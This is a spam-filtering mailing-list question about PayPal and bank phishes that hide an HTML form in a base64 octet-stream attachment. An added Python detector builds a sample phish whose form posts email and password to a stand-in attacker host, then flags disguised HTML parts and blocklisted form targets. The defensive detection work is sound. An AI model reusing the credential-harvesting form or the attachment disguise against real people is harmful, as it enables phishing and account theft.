I'm seeing a spate of PayPal/bank phishes that use an html attachment (base-64 encoded) as the vehicle for the payload.
The body has some innocuous verbiage about problems with the recipient's account and an admonition to complete the attached form to remove the "limitations". The attached form is of type "application/octet-stream" with a name of the form "something.html" so that it gets fed to a web browser when the victim clicks on it. The html is a form that collects the user's info and then does a "post" to the attacker's collection site.

If I save the attachment and view it as a text file I can see lots of things to write rules against (it even contains target URLs that are listed in SURBL blacklists). However all attempts to create such rules fail to match (I'm assuming because of the "application/octet-stream" mime type).

Is there any way to get SA to treat that attachment as text to feed to the rule engine?

-- 
Dave Funk                               University of Iowa
<dbfunk (at) engineering.uiowa.edu>     College of Engineering
319/335-5751   FAX: 319/384-0549        1256 Seamans Center
Sys_admin/Postmaster/cell_admin         Iowa City, IA 52242-1527
#include <std_disclaimer.h>
Better is not better, 'standard' is better.  B{
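The mechanism Dave describes (an HTML form shipped as a base64-encoded application/octet-stream part whose filename ends in .html, hidden from any scanner that only decodes parts it recognises as text) is easy to reproduce and to detect once the part is decoded. The following is an added example written for this post, not code from the original message or from SpamAssassin: it builds a constructed sample message, decodes every attachment whose filename says HTML but whose declared MIME type does not, pulls the form "action" targets out of the decoded text, and checks their hostnames (and parent domains, the way a SURBL lookup walks up the labels) against a small constructed blocklist. The sender, recipient, filename, form URL and the blocklist entry are all made up for the example.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# Constructed HTML form (not from the original post): a credential-collecting
# form that posts to a made-up collection host.
FORM_HTML = (
    '<html><body><form method="post" '
    'action="http://collect.phish-example.test/login.php">'
    'Email <input name="email"> Password <input name="pass" type="password">'
    '<input type="submit" value="Remove limitation"></form></body></html>'
)


def build_sample_message() -> bytes:
    """Build a constructed phish: text body plus the form as octet-stream."""
    msg = EmailMessage()
    msg["From"] = "service@paypal-example.test"   # constructed sender
    msg["To"] = "victim@example.test"             # constructed recipient
    msg["Subject"] = "Your account has limitations"
    msg.set_content("We detected a problem with your account. "
                    "Complete the attached form to remove the limitation.")
    # add_attachment() base64-encodes bytes and labels them with the declared
    # type, so the part looks exactly like the attachments in the post:
    # Content-Type: application/octet-stream; filename ends in .html
    msg.add_attachment(FORM_HTML.encode(), maintype="application",
                       subtype="octet-stream", filename="form.html")
    return msg.as_bytes()


HTML_NAME = re.compile(r"\.html?$", re.IGNORECASE)


def html_disguised_parts(raw: bytes):
    """Return (filename, declared type, decoded text) for every attachment whose
    name claims HTML while its Content-Type claims something else."""
    msg = message_from_bytes(raw, policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename() or ""
        ctype = part.get_content_type()
        if HTML_NAME.search(name) and ctype != "text/html":
            payload = part.get_payload(decode=True)  # undoes the base64 layer
            found.append((name, ctype, payload.decode("utf-8", "replace")))
    return found


ACTION_RE = re.compile(r'<form[^>]*\baction\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
HOST_RE = re.compile(r'^[a-z][a-z0-9+.-]*://([^/:?#]+)', re.IGNORECASE)


def form_targets(html: str):
    """URLs that the decoded form would POST the victim's data to."""
    return ACTION_RE.findall(html)


def target_hosts(html: str):
    """Hostnames of those URLs, lowercased."""
    hosts = []
    for url in form_targets(html):
        m = HOST_RE.match(url)
        if m:
            hosts.append(m.group(1).lower())
    return hosts


def score_message(raw: bytes, blocklist: set) -> dict:
    """Flag disguised HTML parts and any form target whose host, or a parent
    domain of it, is on the blocklist (a SURBL-style walk up the labels)."""
    parts = html_disguised_parts(raw)
    hits = []
    for name, _ctype, text in parts:
        for host in target_hosts(text):
            labels = host.split(".")
            for i in range(len(labels) - 1):
                dom = ".".join(labels[i:])
                if dom in blocklist:
                    hits.append((name, host, dom))
                    break
    return {"disguised_html": [p[0] for p in parts], "blocklisted": hits}


if __name__ == "__main__":
    # Constructed blocklist entry standing in for a SURBL listing.
    print(score_message(build_sample_message(), {"phish-example.test"}))
```

The two signals the scorer emits are the ones worth carrying into a mail filter: the Content-Type/filename mismatch on its own (SpamAssassin's MIMEHeader plugin can match on the part headers without decoding anything), and the blocklisted form target, which only becomes visible after the base64 layer has been stripped and the part is read as text rather than as an opaque octet stream.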